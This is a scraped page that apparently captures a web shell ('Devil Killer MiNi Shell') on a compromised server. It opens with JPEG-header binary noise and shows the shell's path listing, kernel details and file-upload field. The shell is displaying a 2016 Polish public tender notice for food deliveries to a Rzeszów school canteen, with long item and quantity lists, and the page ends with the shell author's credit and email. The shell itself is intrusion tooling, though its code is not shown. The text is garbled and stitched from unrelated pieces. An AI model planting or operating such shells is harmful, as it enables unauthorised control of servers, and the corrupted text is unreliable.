JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160112/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160112/8336-N-2016.html

<p class="kh_header"><b>Rzeszów: Sukcesywna dostawa artykułów żywnościowych dla stołówki Zespołu Szkolno-Przedszkolnego Nr 3 w Rzeszowie w okresie od 1 lutego 2016 r. do 31 grudnia 2016 r.</b><br>
<b>Numer ogłoszenia: 8336 - 2016; data zamieszczenia: 12.01.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkolno-Przedszkolny Nr 3 w Rzeszowie , ul. Skrajna 1, 35-231 Rzeszów, woj. podkarpackie, tel. 17 748 24 30, faks 17 748 24 40.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szkola13.rzeszow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dostawa artykułów żywnościowych dla stołówki Zespołu Szkolno-Przedszkolnego Nr 3 w Rzeszowie w okresie od 1 lutego 2016 r. do 31 grudnia 2016 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Sukcesywna dostawa artykułów żywnościowych dla stołówki Zespołu Szkolno-Przedszkolnego Nr 3 w Rzeszowie w okresie od 1 lutego 2016 r. do 31 grudnia 2016 r. wg zestawień stanowiących załączniki od 2.1 do 2.7. Zakres przedmiotu zamówienia obejmuje: część I - Mięso, drób i wędliny; część II - Ryby i mrożonki; część III - Warzywa i owoce; część IV - Wyroby mleczarskie, nabiał i jaja; część V - Pieczywo; część VI - Wyroby garmażeryjne; część VII - Pozostałe art. spożywcze..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.11.00.00-2, 15.11.21.00-7, 15.13.00.00-8, 15.13.11.30-5, 15.13.15.00-0, 15.20.00.00-0, 15.22.10.00-3, 15.33.11.00-8, 15.89.60.00-5, 03.31.10.00-0, 03.22.22.00-5, 03.22.00.00-9, 03.20.00.00-3, 03.22.11.00-7, 15.50.00.00-3, 15.81.00.00-9, 15.81.00.00-6, 15.85.10.00-8, 03.14.25.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 11.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni w/w warunek, jeżeli prowadzi działalność gospodarczą w zakresie objętym niniejszym zamówieniem - zał. nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowo sposobu oceny tego spełniania tego warunku - zał. nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować właściwym środkiem transportu do dostawy poszczególnych artykułów spożywczych danej kategorii - zał. nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga przedstawienia potwierdzenia dysponowania osobami - zał. nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia - zał. nr 4 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony w odpowiednich miejscach formularz ofertowy, stanowiący zał. nr 1 do SIWZ oraz szczegółowe formularze cenowe stanowiące zał. nr 2.1 - 2.7 dla wybranej części zamówienia.
2. Zaświadczenie z Krajowego Rejestru Sądowego.
3. Prawidłowo wypełniony zał. nr 4 do SIWZ.
4. Parafowany wzór umowy - zał. nr 3 do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Przewiduje się możliwość zmiany umowy w stosunku do treści oferty w następujących przypadkach:
a. zamawiający zastrzega sobie możliwość zwiększania lub zmniejszania ilości zamawianego towaru w zależności od potrzeb wynikających ze zmiany liczby uczniów i wychowanków uprawnionych do korzystania ze stołówki szkolnej i przedszkolnej;
b. w przypadku zmiany stawki podatku VAT na towary sprzedawane w ramach niniejszej umowy zmiana ceny następuje nie wcześniej niż z dniem wejścia w życie aktu prawnego zmieniającego stawkę, po zawarciu stosownego aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szkola13.rzeszow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkolno-Przedszkolny Nr 3 w Rzeszowie, ul. Skrajna 1, 35-231 Rzeszów, I piętro - sekretariat.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.01.2016 godzina 09:00, miejsce: Zespół Szkolno-Przedszkolny Nr 3 w Rzeszowie, ul. Skrajna 1, 35-231 Rzeszów,.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Mięso, drób i wędliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Antrykot - kg 10,
2. Filet z piersi indyka, świeży - kg 175.				
3. Filet z piersi kurczaka, świeży - kg 340,				
4. Karkówka wieprzowa, bez kości, świeża - kg 445,				
5. Kiełbasa podwawelska - kg 225,				
6. Kiełbasa krakowska półsucha - kg 10,				
7. Kiełbasa wiejska - kg 20,				
8. Mięso cielęce b/k świeże - kg 10,				
9. Mięso wołowe b/k świeże - kg 10,				
10. Parówka (cielęca, drobiowa, wieprzowa) - kg	55,				
11. Polędwica drobiowa - kg 25,				
12. Polędwiczki wieprzowe surowe - kg 50,				
13. Porcja rosołowa - kg 450,				
14. Schab bez kości, kl. 1 - kg 340,				
15. Szynka bez kości (kulka) - kg 200,				
16. Szynka wieprzowa gotowana - kg 35,				
17. Szynka wieprzowa wędzona - kg 10,				
18. Udziec z indyka, świeży - kg 100..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-2, 15.13.00.00-8, 15.11.21.00-7, 15.13.11.30-5, 15.13.15.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 11.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> RYBY I MROŻONKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Brokuł mrożony - kg 20,					
2. Fasola szparagowa mrożona - kg 15,					
3. Filet z dorsza - kg 140,					
4. Filet z mintaja - kg 125,					
5. Filet z miruny - kg 225,					
6. Kalafior mrożony - kg 55,					
7. Malina mrożona - kg 60,					
8. Marchewka mini - kg 50,					
9. Mieszanka kompotowa mrożona (bez rabarbaru) - kg	 300,	
10. Mieszanka warzywna 6-8 składnikowa - kg 50,
11. Mieszanka warzywna tzw. meksykańska - kg 60,					
12. Papryka mrożona kolorowa - kg 5,					
13. Porzeczka czarna - kg 300,					
14. Szpinak - kg 5,					
15. Truskawki - kg 225,					
16. Wiśnia mrożona bez pestek - kg 70,					
17. Włoszczyzna paski czteroskładnikowa - kg 300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.31.10.00-2, 15.20.00.00-0, 15.22.10.00-3, 15.33.11.00-8, 15.89.60.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 11.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> WARZYWA I OWOCE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Arbuz - kg 150,				
2. Banan - kg 1245,				
3. Borówka - kg 10,				
4. Brokuł - szt 5,				
5. Brzoskwinia - kg 40,				
6. Burak ćwikłowy - kg 385,				
7. Cebula - kg 160,				
8. Cebula czerwona - kg 10,				
9. Cukinia - kg 10,				
10. Cytryna - kg 20,				
11. Czereśnie - kg 40,				
12. Czosnek - kg 20,				
13. Fasola Jaś karłowy - kg 70,				
14. Fasola Jaś piękny - kg 10,				
15. Fasolka szparagowa - kg 10,				
16. Groch łuskany - kg 45,				
17. Gruszka deserowa - kg 140,				
18. Jabłko deserowe - kg 975,				
19. Kalafior - szt 55,				
20. Kapusta biała - kg 195,				
21. Kapusta czerwona - kg 35,				
22. Kapusta kiszona w wiaderku - kg 265,				
23. Kapusta młoda - kg 50,				
24. Kapusta pekińska - szt 195,				
25. Kapusta włoska - szt 25,				
26. Kiwi - kg 20,				
27. Koperek - szt 420,				
28. Maliny - kg 10,				
29. Mandarynka - kg 260,				
30. Marchew - kg 590,				
31. Natka pietruszki - szt 405,				
32. Nektarynka - kg 120,				
33. Ogórek kiszony w wiaderku - kg 215,				
34. Ogórek świeży (w sezonie) - kg 260,				
35. Ogórek świeży (poza sezonem) - kg 20,				
36. Papryka czerwona - kg 55,				
37. Pieczarki - kg 60,				
38. Pietruszka korzeń - kg 140,				
39. Pomarańcza - kg 20,				
40. Pomidor (poza sezonem) - kg 20,				
41. Pomidor (w sezonie) - kg 210,				
42. Por - szt 225,				
43. Rzodkiewka - szt 25,				
44. Sałata zielona - szt 250,				
45. Seler korzeń - kg 145,				
46. Szczypiorek - szt 460,				
47. Śliwka - kg 40,				
48. Truskawki świeże (owoc sezonowy) - kg 85,				
49. Winogron biały (w sezonie) - kg 80,				
50. Ziemniaki - kg 6500,				
51. Ziemniaki młode (produkt sezonowy - mc VI, VII) - kg 625..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.22.00-5, 03.22.00.00-9, 03.20.00.00-3, 03.22.11.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 11.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> WYROBY MLECZARSKIE, NABIAŁ I JAJA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Jaja L - szt 6200,					
2. Jogurt naturalny - szt 195,					
3. Jogurt owocowy, różne smaki - szt 1770,					
4. Masło 82 % - szt 1345,					
5. Maślanka - l 200, 					
6. Mleko 2 % - l 3625,					
7. Mleko smakowe - szt 3625,					
8. Ser biały półtłusty - kg 365,					
9. Ser żółty pełnotłusty - kg 45,					
10. Serek homogenizowany naturalny - szt 1190,					
11. Serek homogenizowany smakowy - szt 170,					
12. Serek ziarnisty - szt 50,				
13. Śmietana 10-12 % - szt 360..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3, 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 11.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> PIECZYWO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Bułka czerstwa (do mięsa mielonego) - szt 1000,				
2. Bułka grahamka - szt 900,				
3. Bułka kajzerka - szt 500,				
4. Bułka tarta - szt 250,				
5. Bułka wieloziarnista - szt 1200,				
6. Chałka - szt 50,				
7. Chleb graham - szt 570,				
8. Chleb orkiszowy - szt 100,				
9. Chleb razowy - szt 250,				
10. Chleb wiejski żytni - szt 100,				
11. Chleb wieloziarnisty - szt 100,				
12. Chleb zwykły - szt 200..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9, 15.81.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 11.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> WYROBY GARMAŻERYJNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Kluski śląskie - kg 155,				
2. Kopytka - kg 50,				
3. Pierogi ruskie - kg 400,				
4. Pierogi z kapustą słodką - kg 100,				
5. Pierogi z mięsem - kg 100..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.85.10.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 11.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> POZOSTAŁE ARTYKUŁY SPOŻYWCZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Ananasy w puszce - szt 5,					
2. Barszcz czerwony - szt 20,					
3. Bazylia - szt 30,					
4. Brzoskwinie w puszce - szt 5,					
5. Budyń w proszku bez cukru - szt 450,					
6. Chrupki kukurydziane - szt 75,					
7. Chrzan tarty - szt 30,					
8. Cukier biały kryształ - kg 615,					
9. Cukier puder - kg 5	,				
10. Cukier waniliowy - szt 60,					
11. Cynamon - szt 30,					
12. Drożdże w kostce - szt 10,					
13. Dżem owocowy bez dodatku cukru - szt 10,					
14. Fasola czerwona konserwowa - szt 10,					
15. Filet z makreli w oleju - szt 90,					
16. Filet z makreli w pomidorach - szt 10,					
17. Galaretka w proszku różne smaki - szt 450,					
18. Gałka muszkatołowa - szt 20,					
19. Groszek konserwowy - szt 25	,				
20. Groszek ptysiowy - szt 20,					
21. Grzyby suszone - kg 0,3;					
22. Herbata miętowa ekspresowa - szt 20,					
23. Herbata owocowa z suszu - szt 20,					
24. Herbata zwykła ekspresowa - szt 15,					
25. Imbir w proszku - szt 20,					
26. Kakao naturalne - szt 45,					
27. Kasza gryczana prażona w saszetkach - szt 200,					
28. Kasza jaglana w saszetkach - szt 40,					
29. Kasza jęczmienna średnia - kg 20,					
30. Kasza jęczmienna saszetki - szt 300,					
31. Kasza kukurydziana drobna - kg 20,					
32. Kasza manna zwykła - kg 35,					
33. Kawa zbożowa - szt 35,					
34. Keczup łagodny - szt 35,					
35. Kisiel w proszku bez cukru - szt 340,					
36. Kminek mielony - szt 60,					
37. Koncentrat pomidorowy - szt 110,					
38. Kukurydza konserwowa - szt 	80,					
39. Kurkuma - szt 20,					
40. Kwasek cytrynowy - szt 90,					
41. Liść laurowy - szt 110,					
42. Lubczyk - szt 25,					
43. Majeranek - szt 75,					
44. Makaron drobny (muszelki, gwiazdki, literki) - kg 30,
45. Makaron kokardki durum - kg 70,					
46. Makaron łazanki - kg 20,					
47. Makaron nitki (rosołowy) - kg 70,					
48. Makaron pełnoziarnisty - kg 50,					
49. Makaron pióra durum - kg 35	,				
50. Makaron spaghetti durum - kg 65,				
51. Makaron świderki durum - kg 235,					
52. Makaron zacierka - szt 80,					
53. Mąka pełnoziarnista - kg 40,					
54. Mąka pszenna - kg 130,				
55. Mąka ziemniaczana - kg 5,					
56. Migdały w płatkach - szt 20,					
57. Miód naturalny - szt 110,					
58. Morele suszone - szt 20,				
59. Musztarda łagodna - szt 55,					
60. Olej rzepakowy - l 390,					
61. Olej słonecznikowy z pierwszego tłoczenia - l 390,					
62. Oregano - szt 20,					
63. Orzechy włoskie - szt 20,					
64. Otręby pszenne - szt 20,					
65. Paluszki z sezamem - szt 20,					
66. Papryka słodka - szt 75,					
67. Papryka ostra - szt 20,					
68. Pestki dyni łuskane - szt 20,					
69. Pieprz naturalny mielony - szt 115,					
70. Płatki jaglane - szt 30,					
71. Płatki jęczmienne błyskawiczne - szt 30,					
72. Płatki kukurydziane - kg 15,					
73. Płatki kukurydziane pełnoziarniste - kg 15,					
74. Płatki owsiane - kg 5,					
75. Płatki ryżowe - szt 30,					
76. Powidło śliwkowe bez cukru - szt 25,					
77. Proszek do pieczenia - szt 20,					
78. Rodzynki - szt 20,					
79. Ryba wędzona makrela - szt 30,					
80. Ryż biały - kg 120	,				
81. Ryż biały w saszetkach - szt 395,					
82. Ryż naturalny brązowy - kg 50,					
83. Słonecznik łuskany - szt 20,					
84. Soczek owocowy bez cukru w kartoniku - szt 4600,					
85. Sok owocowy bez cukru karton 1-2 l - l 100,					
86. Sok owocowy 100 % tłoczony karton 5 l - l 40	,				
87. Sól o obniżonej zawartości sodu - kg 150,					
88. Śliwki suszone - szt 20,					
89. Tuńczyk w kawałkach w sosie własnym - szt 30,					
90. Wafle ryżowe różne smaki - szt 50,					
91. Woda mineralna gazowana - szt 12,					
92. Woda mineralna niegazowana - szt 495,					
93. Ziele angielskie - szt 120,					
94. Żurek (zakwas) - szt 185..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 11.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com